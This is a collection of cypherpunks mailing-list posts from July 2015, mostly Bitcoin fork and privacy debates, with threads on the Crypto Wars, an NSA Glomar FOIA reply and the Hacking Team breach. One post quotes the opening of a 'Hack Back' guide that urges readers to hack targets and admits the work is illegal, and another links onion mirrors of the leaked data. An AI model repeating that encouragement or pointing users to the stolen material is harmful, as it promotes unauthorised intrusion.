grarpamp wrote: > Depending on who owns the meter and the box it plugs into and > what the contract says... don't remove it, build a faraday > cage around it. Check the specs on the thing before trusting a cage - utility companies have been sending C&C signals over power lines forever. I had a PC sound system amp that could pick some of that up as occasional little zap-zap-zap-zap bursts of compressed TTY noise. The house had some kind of power management gear hooked up to the meter, putting a UPS on the line stopped the noise, QED. (More or less, didn't have an o-scope so I can't prove nothing.) :D -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIcBAEBAgAGBQJVmuuYAAoJEDZ0Gg87KR0LEBcP/0j9NLU9Kw/8+m1JdAOKs8YY V/eY28YOE/YS4jlz5KmJgxKjQZceUkiw6RsqIBbiNRDiCh/GsW5QOQcbpOPjtL/o sAZ2Dw5liWaDYxQzNRtS62IjezQbpkDvuF+HAWp3nZ+NW0OFEGliWhNH3DEvaZcG IMcKAN84rvNMsXrYwZpTQLKpzmVm/mnvzfgsKXr6e4c4MzlbO6K55iFlNLp3/Qoy zMnYLvTOqQ/brPURfC91mxYVz2qh9eKEBTV5EJrviU5Pm/1Ao3IWFQofN9gjZXQ7 O+GUFZUjHVhhJpnnvGDwmfDLcr3a0PUqz5PVW2SZZdUYsZvDskPKjg1EsW4qRAuV zqktEqR4UTZL/9oF3sZ7mF3T+NSKDEYd5vMZ5JycCKfqlXeSNn/1FoVKR8hXvjsf jAiYC7T00h5aUwJiTWkfkuobaQ92+TjNN/NJUcsmosf5V9Ztl859bAbYVyyLZRJg WwzG6chzgTBvBtsbNtC2vcvmQJdxRvSWfqnmRa7f10Y8KV+iWl7tU2nuOvrxoI9w 8yw6a3PRZ1mgYBqvsMVJWMvHGaWzgO5QnbwJhrZcD3L5hwXrIDMb9G1emc6i51/W zjraZR7z1qx+QNwVvWJYALOG4YlSQ/v5uGpTs6JkIiqWETndIIF3q+HzAfIPtnrH M3bD+nUK1J9spyPnUxi0 =gOte -----END PGP SIGNATURE----- From seanl at literati.org Mon Jul 6 10:04:56 2015 From: seanl at literati.org (Sean Lynch) Date: Mon, 06 Jul 2015 17:04:56 +0000 Subject: [Bitcoin-development] questions about bitcoin-XT code fork & non-consensus hard-fork In-Reply-To: <559a137b.1928370a.3f973.ffffde4a@mx.google.com> References: <20150616081131.GL10743@leitl.org> <1741267.YsnpBZuTEf@lapuntu> <1723765.Bfy9H6RHV9@lapuntu> <5599DC34.1060006@echeque.com> <559a137b.1928370a.3f973.ffffde4a@mx.google.com> Message-ID: On Sun, Jul 5, 2015 at 10:41 PM Juan wrote: > On Mon, 06 Jul 2015 11:39:00 +1000 > "James A. Donald" wrote: > > > > > > Way back in the beginning I said an ever growing block chain would > > cause unacceptable costs and inconvenience, and lo and behold, it is > > causing substantial and ever growing costs and inconvenience. > > > > But look at the bright side! Every single transaction gets > recorded and stored, until jesus destroys the universe (it's in > the bible). What else can privacy advocates wish for? > > Transparency is also useful, and privacy can be built on top of it through the use of, say, Chaumian e-cash backed by a blockchain-based cryptocurrency. It's a lot easier for the issuing organization to prove that it has a certain amount of Bitcoin than a certain amount of gold. E-gold and even one of the gold ETFs have been accused of double-counting. And if you're using Tor to connect to the network and break up your transactions, it's pretty easy to obfuscate, even without ZeroCoin, and ZeroCoin just fixes the whole problem. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1533 bytes Desc: not available URL: From juan.g71 at gmail.com Mon Jul 6 17:01:11 2015 From: juan.g71 at gmail.com (Juan) Date: Mon, 6 Jul 2015 21:01:11 -0300 Subject: [Bitcoin-development] questions about bitcoin-XT code fork & non-consensus hard-fork In-Reply-To: References: <20150616081131.GL10743@leitl.org> <1741267.YsnpBZuTEf@lapuntu> <1723765.Bfy9H6RHV9@lapuntu> <5599DC34.1060006@echeque.com> <559a137b.1928370a.3f973.ffffde4a@mx.google.com> Message-ID: <559b16b5.37638c0a.a4a00.698a@mx.google.com> On Mon, 06 Jul 2015 17:04:56 +0000 Sean Lynch wrote: > On Sun, Jul 5, 2015 at 10:41 PM Juan wrote: > > > On Mon, 06 Jul 2015 11:39:00 +1000 > > "James A. Donald" wrote: > > > > > > > > > > Way back in the beginning I said an ever growing block chain would > > > cause unacceptable costs and inconvenience, and lo and behold, it > > > is causing substantial and ever growing costs and inconvenience. > > > > > > > But look at the bright side! Every single transaction gets > > recorded and stored, until jesus destroys the universe > > (it's in the bible). What else can privacy advocates wish for? > > > > > Transparency is also useful, and privacy can be built on top of it > through the use of, say, Chaumian e-cash backed by a blockchain-based > cryptocurrency. It's a lot easier for the issuing organization to > prove that it has a certain amount of Bitcoin than a certain amount > of gold. E-gold and even one of the gold ETFs have been accused of > double-counting. Well, I wasn't advocating any solution in particular, just making a snarky remark on one of bitcoin's most notable (IMO at least) properties. But since you mention something like e-gold (or similar systems) : yes, I realize they have the same problmes any ordinary bank has - how to make sure they are not lying. >And if you're using Tor to connect to the network > and break up your transactions, it's pretty easy to obfuscate, even > without ZeroCoin, and ZeroCoin just fixes the whole problem. I guess it's wait and see for me. I freely admit I'm tad a skeptical about the whole crypto infrastructure... (not even taking 'solutions' like tor into account...) From ncl at cock.li Mon Jul 6 16:39:52 2015 From: ncl at cock.li (ncl at cock.li) Date: Mon, 6 Jul 2015 23:39:52 +0000 Subject: Hacking Team has been hacked (hard) In-Reply-To: <5599F683.40200@gna.org> References: <5599F683.40200@gna.org> Message-ID: <559B11C8.9030508@cock.li> and are apparently responding to mirrorers with ddos: https://twitter.com/ageis/status/618195459270578176 https://twitter.com/musalbas/status/618200071411265536 https://twitter.com/CthulhuSec/status/618171247847976960 etc. From grarpamp at gmail.com Mon Jul 6 22:01:11 2015 From: grarpamp at gmail.com (grarpamp) Date: Tue, 7 Jul 2015 01:01:11 -0400 Subject: Hacking Team has been hacked (hard) In-Reply-To: <5599F683.40200@gna.org> References: <5599F683.40200@gna.org> Message-ID: These days, anonymous networks are carrying lots of different types of datasets, including those in the subject... http://hakteamvayuhxoe7.onion/ http://hacked4pe7dih4ds.onion/ From grarpamp at gmail.com Mon Jul 6 23:07:02 2015 From: grarpamp at gmail.com (grarpamp) Date: Tue, 7 Jul 2015 02:07:02 -0400 Subject: [Bitcoin-development] questions about bitcoin-XT code fork & non-consensus hard-fork In-Reply-To: <5599DC34.1060006@echeque.com> References: <20150616081131.GL10743@leitl.org> <1741267.YsnpBZuTEf@lapuntu> <1723765.Bfy9H6RHV9@lapuntu> <5599DC34.1060006@echeque.com> Message-ID: On Sun, Jul 5, 2015 at 9:39 PM, James A. Donald wrote: > substantial and ever growing costs and inconvenience. > > Of course, restraining the block chain to manageable growth without losing > other good characteristics is inherently hard Doubt there's any use case that requires "bignum" worth of single fully independant "full" nodes trucking around tens of TB worth of ancient history. With new things come new rules. Bitcoin could declare 1/2/5/10 year checkpoint intervals by which addresses must forward to new addresses. It could distribute the legacy data across legacy archive farms who demand monetize their existance as daily tx miners do. If for some reason user wasn't able to forward in time, the farms could issue checkpoint statements [for all] or sign their tx for a fee, user might dissolve value back into and out of the farms under contract, etc. Seems many different ways to solve the petabytes / phone problem. And as long as no one, not even the anonymous ever has to go outside bitcoin, such as to an exchange... it's still bitcoin. What's "hard" about bitcoin is deciding how to do the tech while still remaining true to the original philosophies. From grarpamp at gmail.com Mon Jul 6 23:41:13 2015 From: grarpamp at gmail.com (grarpamp) Date: Tue, 7 Jul 2015 02:41:13 -0400 Subject: [Cryptography] Crypto Wars In-Reply-To: <201507070155.t671tIsc021152@new.toad.com> References: <559A5C3B.6050600@riseup.net> <14e64978b10.2774.006c0aa2e0fba7cbe3bcf7ae77fa76a2@rogaar.org> <201507070155.t671tIsc021152@new.toad.com> Message-ID: >> elephant wrote: >> Would anyone be able to recommend me good literature on the Crypto Wars? >> Both historical and theoretical accounts (if they exist) would be great, >> digital or printed. Either stuff on the Crypto Wars I or II would be fab. > gnu wrote: > gone from > the Cryptome site, the JYA.com site, and the EFF.ORG sites. But http://cryptome.org/jya/cracking-des/cracking-des.htm http://web.archive.org/web/20000409094154/http://www.heise.de/tp/english/inhalt/te/5124/1.html "I believe we must soon address the risks posed by electronic distribution of encryption software... unless we address this situation, use of the Internet to distribute encryption products will render [our] controls immaterial." -- 1999: USA, FVEY, et al https://www.google.com/search?tbm=isch&q=not+dead+yet https://www.google.com/search?tbm=isch&q=kill+it From grarpamp at gmail.com Tue Jul 7 00:08:08 2015 From: grarpamp at gmail.com (grarpamp) Date: Tue, 7 Jul 2015 03:08:08 -0400 Subject: NSA liquid cooled computing Message-ID: http://www.grcooling.com/wp-content/uploads/2015/06/NSA-The-Next-Wave.pdf From schear.steve at gmail.com Tue Jul 7 01:05:58 2015 From: schear.steve at gmail.com (Steven Schear) Date: Tue, 7 Jul 2015 08:05:58 +0000 Subject: [Bitcoin-development] questions about bitcoin-XT code fork & non-consensus hard-fork In-Reply-To: References: <20150616081131.GL10743@leitl.org> <20150617042859.GX27932@nl.grid.coop> Message-ID: Coming in a bit later here. To me the essence of the reasoning for the fork is to head off the possibility that sometime in the not too distant future the demand of bitcoin users to transact on the blockchain will exceed the supply. That certainly might happen if fees don't respond to supply-demand economics. Those pushing bitcoin to compete with MasterCard/VISA are, IMHO, a bit crazy. Like shoemakers always reaching for a hammer every time these people see a transactional opportunity they reach for the blockchain. I think that's just plain silly. Bitcoin is not well suited for all transactional situations. In the longer-term it seems great to replace, for example, SWIFT and bank wires but rather poor for those that require cheap- or ultra-cheap real-time settlement whereas some alternatives seem tailor-made for this. Then again maybe I am missing the key reasoning for this fork. On Fri, Jun 19, 2015 at 5:07 AM, Dr Adam Back wrote: > Its clear Gavin knows more about Bitcoin code and detailed micro > algorithms than I do (there are many detailed algorithms for anti-DoS > etc at code level which I do not know). > > Its possible I know more than Gavin or have a better internalised > reasoning about the logic and design parameters for about > decentralised systems and distributed trust systems, and ecash > protocols, threat models in p2p privacy systems - which is quite a big > slice of what Bitcoin is trying to do. Or not - I dont know all of > Gavin's expertise nor career experience! Something you may not > realise is a bunch of us on the cypherpunks list back in like > 1995-2005 spent a lot of applied research effort into finding a way to > do something with the characteristics of bitcion. My PhD is in > distributed systems also. > > Anyway I do not mean to have claims to authority, particularly because > I believe firmly in pure meritocracy philosophically and detest such > argumentation as a failure of reason, but coincidentally I do actually > know something about it and worked on it on Bitcoin-like system design > and p2p novel trust-model & security model on and off for 20 years. > > But I do think people who are proposing big-blocks are underestimating > and being super-optimistic about a range of things, almost to naive > extent. I am not imputing unsaid things, Gavin wrote many blog posts > on these topics. Mike Hearn made some videos and posts about his > views, and they are quite disconnected from p2p privacy system design > thinking. Someone should probably respond to some of those posts to > clarify why they think some of these assumptions are incorrect and > optimistic to prior experience and precedent. > > Adam > > On 18 June 2015 at 20:24, Sean Lynch wrote: > > > > > > On Wed, Jun 17, 2015 at 3:51 PM Dr Adam Back > wrote: > >> > >> If people on *cypherpunks* cant get the points in the post, I think > >> the world has a problem. The price of security in a distributed > >> system like bitcoin is eternal vigilance, but if people dont > >> understand what constitutes a risk and hence what to be vigilant for, > >> the meta-system can be unreliable and lose its assurances. I think we > >> need to explain some more concepts and probably people will over time > >> learn things and and an influencer pyramid emerge as happened in > >> privacy technology. > >> > > > > Yes, I'm sure that when people who disagree with you, it's always because > > they are wrong and never because you don't understand the situation as > well > > as you think you do. I'm sure you know more about Bitcoin than Gavin > does. > -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 4384 bytes Desc: not available URL: From Rayzer at riseup.net Tue Jul 7 13:32:35 2015 From: Rayzer at riseup.net (Razer) Date: Tue, 07 Jul 2015 13:32:35 -0700 Subject: "Google is to surveillance capitalism what GM was to managerial capitalism" Message-ID: <559C3763.1000205@riseup.net> > Big Other: Surveillance Capitalism and the Prospects of an Information > Civilization > > Shoshana Zuboff, Berkman Center for Internet & Society; Harvard > Business School > > April 4, 2015 > > Abstract: > This article describes an emergent logic of accumulation in the > networked sphere, ‘surveillance capitalism,’ and considers its > implications for ‘information civilization.’ Google is to surveillance > capitalism what General Motors was to managerial capitalism. Therefore > the institutionalizing practices and operational assumptions of Google > Inc. are the primary lens for this analysis as they are rendered in > two recent articles authored by Google Chief Economist Hal Varian. > > Varian asserts four uses that follow from computer-mediated > transactions: ‘data extraction and analysis,’ ‘new contractual forms > due to better monitoring,’ ‘personalization and customization,’ and > ‘continuous experiments.’ > > An examination of the nature and consequences of these uses sheds > light on the implicit logic of surveillance capitalism and the global > architecture of computer mediation upon which it depends. This > architecture produces a distributed and largely uncontested new > expression of power that I christen: ‘Big Other.’ It is constituted by > unexpected and often illegible mechanisms of extraction, > commodification, and control that effectively exile persons from their > own behavior while producing new markets of behavioral prediction and > modification. Surveillance capitalism challenges democratic norms and > departs in key ways from the centuries long evolution of market > capitalism. > > Number of Pages in PDF File: 15 > > Keywords: surveillance capitalism, big data, Google, information > society, privacy, internet of everything http://papers.ssrn.com/sol3/papers.cfm?abstract_id=2594754 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 819 bytes Desc: OpenPGP digital signature URL: From l at odewijk.nl Mon Jul 6 22:01:05 2015 From: l at odewijk.nl (=?UTF-8?Q?Lodewijk_andr=C3=A9_de_la_porte?=) Date: Tue, 7 Jul 2015 14:01:05 +0900 Subject: [Bitcoin-development] questions about bitcoin-XT code fork & non-consensus hard-fork In-Reply-To: <5599DC34.1060006@echeque.com> References: <20150616081131.GL10743@leitl.org> <1741267.YsnpBZuTEf@lapuntu> <1723765.Bfy9H6RHV9@lapuntu> <5599DC34.1060006@echeque.com> Message-ID: 2015-07-06 10:39 GMT+09:00 James A. Donald : > Way back in the beginning I said an ever growing block chain would cause > unacceptable costs and inconvenience, and lo and behold, it is causing > substantial and ever growing costs and inconvenience. > It is, but also it really isn't. Spending an hour of my lawyer talks to your lawyer costs more than the whole blockchain, including operational costs, for a long time. If you'd like to do anything with a bank, for a fraction of the features at IMMENSELY OVERSIZED WTF prices - just the time spent negotiating it is outrageously more expensive. We're nowhere near unacceptable, and it doesn't seem we will ever be. It's something to think about, and you'll have to use SPV/API's in many cases where there would be some value to not having to use them. That's definitely not convenient, but also not that big a deal. Juan: > But look at the bright side! Every single transaction gets > recorded and stored, until jesus destroys the universe (it's in > the bible). What else can privacy advocates wish for? Bitcoin is often misrepresented to be: * Private * Free * Promoting equality (it does the /exact/ opposite!) * Jesus Don't play a satire of the shims, Juan. Whales pay liars, just ignore people's words and hear their arguments. The only thing that's hard is realizing so few are doing it. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2180 bytes Desc: not available URL: From Rayzer at riseup.net Tue Jul 7 15:11:20 2015 From: Rayzer at riseup.net (Razer) Date: Tue, 07 Jul 2015 15:11:20 -0700 Subject: Hacking Team has been hacked (hard) In-Reply-To: <5599F683.40200@gna.org> References: <5599F683.40200@gna.org> Message-ID: <559C4E88.4050506@riseup.net> On 07/05/2015 08:31 PM, Christian Gagneraud wrote: > As nobody has reported it yet, here we go: > https://twitter.com/hackingteam > Ahhh! Here we go... > (In Solidarity with:) “everyone in Gaza, Israeli > conscientious-objectors, Chelsea Manning, Jeremy Hammond, Peter Sunde, > anakata, and all other imprisoned hackers, dissidents, and criminals!” By the hacker who doxxed Hacking Team: > | | | | __ _ ___| | __ | __ ) __ _ ___| | _| | > | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / | > | _ | (_| | (__| < | |_) | (_| | (__| <|_| > |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_) > > A DIY Guide for those without the patience to wait for whistleblowers > > > --[ 1 ]-- Introduction > > I'm not writing this to brag about what an 31337 h4x0r I am and what m4d sk1llz > it took to 0wn Gamma. I'm writing this to demystify hacking, to show how simple > it is, and to hopefully inform and inspire you to go out and hack shit. If you > have no experience with programming or hacking, some of the text below might > look like a foreign language. Check the resources section at the end to help you > get started. And trust me, once you've learned the basics you'll realize this > really is easier than filing a FOIA request. > > > --[ 2 ]-- Staying Safe > > This is illegal, so you'll need to take same basic precautions: http://0x27.me/HackBack/0x00.txt (wget this file if paranoid) Via Morgan Mayhem https://twitter.com/headhntr/status/618513829282975744 Mirrored @ my tumblr http://auntieimperial.tumblr.com/post/123489352994 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 819 bytes Desc: OpenPGP digital signature URL: From grarpamp at gmail.com Tue Jul 7 12:21:50 2015 From: grarpamp at gmail.com (grarpamp) Date: Tue, 7 Jul 2015 15:21:50 -0400 Subject: Bitcoin philosophical musings and pressures 7 years in [drifted from: txrate, forking, etc] Message-ID: > Then again maybe I am missing the key reasoning for this fork. People often miss the fundamental reasons Bitcoin exists, the various conjoined ethos behind its creation. This is to be expected, it's so far ouside any thinking or life process they've ever had to do or been exposed to. It's also partly why figuring out what to do or code or adopt, is hard. And certainly not made any easier by the long term need and the current value at stake. Creating a system in which a Botswanan can give a few bits of their impoverished wages to their friend in Mumbai without it being gated, permitted, hierarchied, middlemanned, taxed, tracked, stolen and feed-upon until pointless... this simply doesn't compute for these people. Their school of thought is centralization, profit, control and oppression. So of course they see txrate ramming up against an artificial wall as perfectly fine, it enables and perpetuates their legacy ways. Regardless of whichever technical way the various walls are torn down, what's important is that they are. And that those who are thinking outside the box do, and continue to, take time to school these legacy people such that they might someday become enlightened and join the ethos. Otherwise might as well work for ICBC, JPMC, HSBC, BNP, MUFG and your favorite government. Probably not as much fun though. From juan.g71 at gmail.com Tue Jul 7 14:57:16 2015 From: juan.g71 at gmail.com (Juan) Date: Tue, 7 Jul 2015 18:57:16 -0300 Subject: Bitcoin philosophical musings and pressures 7 years in [drifted from: txrate, forking, etc] In-Reply-To: References: Message-ID: <559c4b24.d6a48c0a.a6394.0140@mx.google.com> On Tue, 7 Jul 2015 15:21:50 -0400 grarpamp wrote: > Creating a system in which a Botswanan can give a few bits > of their impoverished wages to their friend in Mumbai What? Bitcoin exists so that rich people in western countries especially the US can become even richer. So far it worked pretty well. Bitcoin hasn't led to any meaningful political/economic change yet, apart from possibly triggering the demise of government cash, which would be a complete disaster. Talk about 'unintended consequences' (unintended?) A likely scenario exists in which there wouldn't be any independent crypto-currency. There would be fully 'traceable' electronic currencies controlled as always by the state and the banking mafia. > without > it being gated, permitted, hierarchied, middlemanned, taxed, > tracked, stolen and feed-upon until pointless... this simply > doesn't compute for these people. Their school of thought is > centralization, profit, control and oppression. So of course they > see txrate ramming up against an artificial wall as perfectly fine, > it enables and perpetuates their legacy ways. > > Regardless of whichever technical way the various walls are torn down, > what's important is that they are. And that those who are thinking > outside the box do, and continue to, take time to school these > legacy people such that they might someday become enlightened > and join the ethos. > > Otherwise might as well work for ICBC, JPMC, HSBC, BNP, MUFG > and your favorite government. Probably not as much fun though. From odinn.cyberguerrilla at riseup.net Tue Jul 7 19:08:38 2015 From: odinn.cyberguerrilla at riseup.net (odinn) Date: Tue, 07 Jul 2015 19:08:38 -0700 Subject: Inquiry re. how to handle Glomar reply to FOIA request Message-ID: <559C8626.9070504@riseup.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hello, A while back (specifically, on 6/01/2015) I sent in a FOIA request to the NSA, requesting, in part, records about myself that "would have been collected by the NSA under programs authorized by Sections 206 and 215 of the USA PATRIOT Act, and Section 6001(a) of the IRTPA, aforementioned programs and sections which are now expired as of the date of this request (June 1, 2015)." In essence, I figured, since the underlying legal authority for the program had lapsed (however briefly), there was no time like that present moment to file a FOIA request. And so, I did, not using USPS mail, but a digital service to ensure it would arrive timely. My request was actually rather lengthy; that was just a small part, and I requested any NSA records collected on my person as a result of use of Sections 206 or 215 of the USA PATRIOT Act, or Section 6001(a) of the IRTPA, from Oct. 26, 2001 to the date of expiration and sunset of those Sections on midnight May 31st 2015. (For those who are trying to remember the timeline of what ended up replacing all that, the USA Freedom Act was signed into law on June 2, 2015.) ~~ The NSA failed to respond within the 20 business days required by federal law and sent back a "Glomar response." Technically, as of today, I only have 49 days left to write and send an appeal (based on the date when they sent me their Glomar reply). So... if you have ever done a SUCCESSful appeal of a Glomar response, please reply back to me and let me know (give me some advice, etc). Thanks in advance. I've copied a portion of the letter they sent below: "As you may also be aware, there has been considerable coverage of two NSA intelligence programs in the press /media. Under Sec. 215 of the USA PATRIOT Act, as authorized by the Foreign Intelligence Surveillance Court NSA may acquire telephone metadata, such as the telephone numbers dialed and length of calls, but not the content of calls or the names of the communicants. Under Sec. 702 of the FISA, with appropriate authorization, NSA may target non-US. persons reasonably believed to be located outside the United States for foreign intelligence purposes. Under the FISC-authorized Sec. 215 authority, NSA cannot review any metadata unless strict requirements are met, the data may be queried only when there is a reasonable suspicion, based on speci?c facts, that a phone number is associated with a foreign terrorist organization. Likewise, under Sec. 702, there are strict controls approved by the FISC to help ensure that no US. person is targeted and FISC-approved minimizations procedures to ensure the protection of any information concerning U.S. persons that may be incidentally acquire d. Although these two programs have been publicly acknowledged, details about them remain classified and /or protected from release by statutes to prevent harm to the national security of the United States. To the extent that your request seeks any information on you in relation to NSA intelligence programs, or in relation to any specific methods or means for conducting the programs, we cannot acknowledge the existence or non-existence of such information. Any positive or negative response on a request-by-request basis would allow our adversaries to accumulate information and draw conclusions about technical capabilities, sources, and methods. Our adversaries are likely to evaluate all public responses related to these programs. Were we to provide positive or negative responses to requests such as yours, our adversaries compilation of the information provided would reasonably be expected to cause exceptionally grave damage to the national security. Therefore, your request is denied because the fact of the existence or non-existence of responsive records is a currently and properly classified matter in accordance with Executive Order 13526, as set forth in Subparagraph of Section 1.4. Thus, your request is denied pursuant to the first exemption of the FOIA, which provides that the FOIA does not apply to matters that are specifically authorized under criteria established by an Executive Order to be kept secret in the interest of national defense or foreign relations and are properly classified pursuant to such Executive Order. Moreover, the third exemption of the FOIA provides for the withholding of information specifically protected from disclosure by statute. Thus, your request is also denied because the fact of the existence or non-existence of the information is exempted from disclosure pursuant to the third exemption. The specific statutes applicable in this case are: Title 18 US. Code 798; Title 50 US. Code 3024(i); and Section 6, Public Law 86?36 (50 US. Code 3605). (....) Paragraph 3.6(a) of Executive Order 13526 specifically authorizes this type of response, also known as a Glomar response, to a request made under the FOIA, PA, or the mandatory review provisions of this Order. The statutes cited above under the third exemption of the FOIA would also apply to the denial of the fact of the existence or non-existence of the information if sought under the PA. The Initial Denial Authority for NSA information is the Associate Director for Policy and Records, David J. Sherman. As your request is being denied, you are hereby advised of this Agency's appeal procedures. Any person denied access to information may file an appeal to the CSS Freedom of Information Act/ Privacy Act Appeal Authority. The appeal must be postmarked no later than 60 calendar days of the date of the initial denial letter. The appeal shall be in writing addressed to the (...) - -- http://abis.io ~ "a protocol concept to enable decentralization and expansion of a giving economy, and a new social good" https://keybase.io/odinn -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQEcBAEBAgAGBQJVnIYlAAoJEGxwq/inSG8CQQQH/iLwr11gjbrHrAWaeiJ3Qllr zH+cNwUMLciht/2RhSaY/D5bNYczTUTyBUlKA4I4mhMYBjQPhBgHDI/E1QY0swJG CLLvDPkXunLg++lri5lnvlI+jSTakBIFyRdBsP8CcoHSpNOJhEtThqlsAoRog/Br 7CPIAF2t6XCESiSILAhmo791U5w1m2OmWCqO92JLjee6LP/2QK7QkYRvuJ9TzSnA B3aMY8pCDdjweJAueKq24ONL7lZuXZ38mZVjFPnUJsUCVQ7qlzjC5WAlB+So0lXu ifJTOP46CH4xV4YuObMb7Xi++O9fQSsM1ApM49uN9GIiHbXnjGm1NVzXfelZ0mc= =JyE1 -----END PGP SIGNATURE----- From juan.g71 at gmail.com Tue Jul 7 16:22:32 2015 From: juan.g71 at gmail.com (Juan) Date: Tue, 7 Jul 2015 20:22:32 -0300 Subject: Bitcoin philosophical musings and pressures 7 years in [drifted from: txrate, forking, etc] In-Reply-To: References: <559c4b24.d6a48c0a.a6394.0140@mx.google.com> Message-ID: <559c5f23.c328370a.7776d.1c71@mx.google.com> On Tue, 07 Jul 2015 22:27:01 +0000 Sean Lynch wrote: > On Tue, Jul 7, 2015 at 3:02 PM Juan wrote: > > > On Tue, 7 Jul 2015 15:21:50 -0400 > > grarpamp wrote: > > > > > > > Creating a system in which a Botswanan can give a few bits > > > of their impoverished wages to their friend in Mumbai > > > > > > What? Bitcoin exists so that rich people in western > > countries especially the US can become even richer. So far it worked > > pretty well. > > > > Really? What rich person has gotten richer through Bitcoin so far? It seems kinda obvious that virtually all bitcoin developers and users *in the west* are richer than people in Africa and India. That's what I was getting at. Bitcoin devs - *already rich by 'third world' standards* - are richer now. Millionaires even (notice that grarpamp was talking about impoverished wages...and people) > Remittances seem like the biggest use of Bitcoin at the moment. Sure, > there's plenty of speculation, but your claim that Bitcoin's purpose > is to make the rich richer is also speculation. And FUD. So what amount of btc is being used to make payments between Botswana and Mumbai? What amount of btc is being used to speculate/gamble in a few big, centralized and fully NSA-AML-monitored exchanges? > > > > Bitcoin hasn't led to any meaningful political/economic > > change yet, apart from possibly triggering the demise of > > government cash, which would be a complete disaster. Talk > > about 'unintended consequences' (unintended?) > > > > I can't imagine you've read a single thing written by the people who > influenced the creation of Bitcoin if you think that the collapse of > fiat currencies is an unintended consequence. But I said *cash* not fiat. And the collapse of relatively untraceable *cash* is *bad*. What we may end up with is FIAT currencies and NO CASH option* for those fiat currencies. Bad. Pretty bad. *aka credit cards. > Any fiat currency that > is so bad that its users prefer to use Bitcoin deserves to collapse. > Of course, so far, while Bitcoin has become popular in places like > Argentina Do you know where I live? Of course you don't have to know where I live. But you'll know it in a second anyway. I live in argentina - and let me tell you, bitcoin isnt exactly 'popular' here. > and Venezuela, the US dollar remains by far the more > popular alternative currency in those places. Yep, that's quite correct as far as argentina goes. I suspect it's true regarding venezuela as well. > And if Greece exits the > Euro and starts printing Drachmas there, they will have to worry > about people trading their Drachmas for Euros, not for Bitcoin. > > > > A likely scenario exists in which there wouldn't be any > > independent crypto-currency. There would be fully > > 'traceable' electronic currencies controlled as always by the state > > and the banking mafia. > > > > By what evidence do you estimate that this is a "likely" scenario? The evidence is called 'history'. That, and the nature of government and its business 'partners' - or accomplices. > You may be right that many nation-states and banks will be loathe to > accept an untraceable and uncontrollable crypto-currency, but that's > the whole point; You seem to be assuming that an uncontrollable and untraceable crypto-currency exist? I'm not seeing anything of the sort. > they're not going to have a choice. Cryptocurrencies > don't have to be legal to be disruptive. And yet there seems to be a fair amount of people in the bitcoin 'community' who are quite eager (or desperate) to have bitcoin 'regulated' so that it becomes 'respectable', 'legal'...and usable. Of course, this isn't a shortcoming that only affects btc. Anything that the government 'outlaws' becomes harder to transact. > The main problem that > they've run up against before now is the lack of healthy underground > markets to take advantage of them. Given time, governments' and > banks' opinions and policies about cryptocurrencies will become > irrelevant. I do wish that was actually the case, but I think that view doesn't fully take into account the capabilities of the 'enemy'. J. From odinn.cyberguerrilla at riseup.net Tue Jul 7 20:52:52 2015 From: odinn.cyberguerrilla at riseup.net (odinn) Date: Tue, 07 Jul 2015 20:52:52 -0700 Subject: Bitcoin philosophical musings and pressures 7 years in [drifted from: txrate, forking, etc] In-Reply-To: <559c93ca.656b8c0a.4ba8.2f81@mx.google.com> References: <559c4b24.d6a48c0a.a6394.0140@mx.google.com> <559c5f23.c328370a.7776d.1c71@mx.google.com> <559c93ca.656b8c0a.4ba8.2f81@mx.google.com> Message-ID: <559C9E94.8010603@riseup.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 My thoughts on that... On 07/07/2015 08:07 PM, Juan wrote: > On Wed, 08 Jul 2015 00:08:40 +0000 Sean Lynch > wrote: > > >> >> This is not what most people mean when they say "rich get >> richer." They're talking about 1%ers or whatever. In any case, >> you still seem to be making unfounded claims about the intent >> behind Bitcoin, > > > Let's say I was being cynical =) > > Let's say you were. > >> when we have statements of intent in the creator's own words. > > I know. > > "A purely peer-to-peer version of electronic cash would allow > online payments to be sent directly from one party to another > without going through a financial institution." > > > (Come to think of it, I wouldn't say btc is cash, but that's yet > another philosophical discussion) > > "Online payments to be sent directly from one party to another without going through a financial institution" is indeed what Satoshi intended, and so you could ask, "but what about all the fiat and how do you deal with 'the bank problem?'" Well and good... Satoshi was apparently thinking about that same issue, of a decentralized market within bitcoin, but it just didn't get finished. And in February of 2010, it was stripped out of bitcoin. (Insert ripping sound here.) https://github.com/bitcoin/bitcoin/commit/5253d1ab77fab1995ede03fb934edd 67f1359ba8 Go OpenBazaar, etc. They (and some other similar projects) are carrying the torch of decentralized marketplaces that don't require legacy institutions to operate. > >> Many believe Satoshi is also rich, Bitcoin-wise, but we don't >> even know for sure that they have the key to the account or that >> they will ever spend that Bitcoin. Personally, I hope they do. >> The creator of Bitcoin deserves to be rewarded. >> > > Yes. Anyway, grarpamp comment sounded to me like "We're doing it > for the poor children of africa" which struck me as somewhat > hollow. But nevermind, I'll drop the subject. > > > >> My apologies. I was confused by your use of the phrase >> "government cash." Government cash is fiat, but not all fiat is >> cash. But the cashless societies already being proposed and >> implemented are fully centralized and much easier to trace than >> Bitcoin, because they require bank accounts with their >> concomitant "know your customer" regulations. Bitcoin doesn't >> make this situation worse, > > > True. My comment or observation is that bitcoin may have catalyzed > the move towards a cashless society. Whether a cpunk-like currency > will be used, or a goldman-sachs-like currency will be used remains > to be seen, I think. > > But so be it I guess. If governments are forced to show their true > totalitarian colors to an even larger extent than they do now, > there will be some good in that. > > > >> and by enabling other applications on top of it, including >> untraceable e-cash, will only make it better. >> > > I pledge the "wait and see" amendment =P I hope you're right. > > > >> >> Can you elaborate? Does your use of quotes around the word >> "popular" indicate sarcasm? My understanding was that a number of >> merchants had started using a payment system that used dollars >> from foreign credit cards to buy Bitcoin so that they did not >> have to accept the government-imposed exchange rate. > > Actually, there are some people who use credit cards to buy btc > (or other stuff abroad) using a government subsidized exchange > rate. > > The are a couple of official exchange rates. One is set at ~8 pesos > = 1 dollar. The other is at 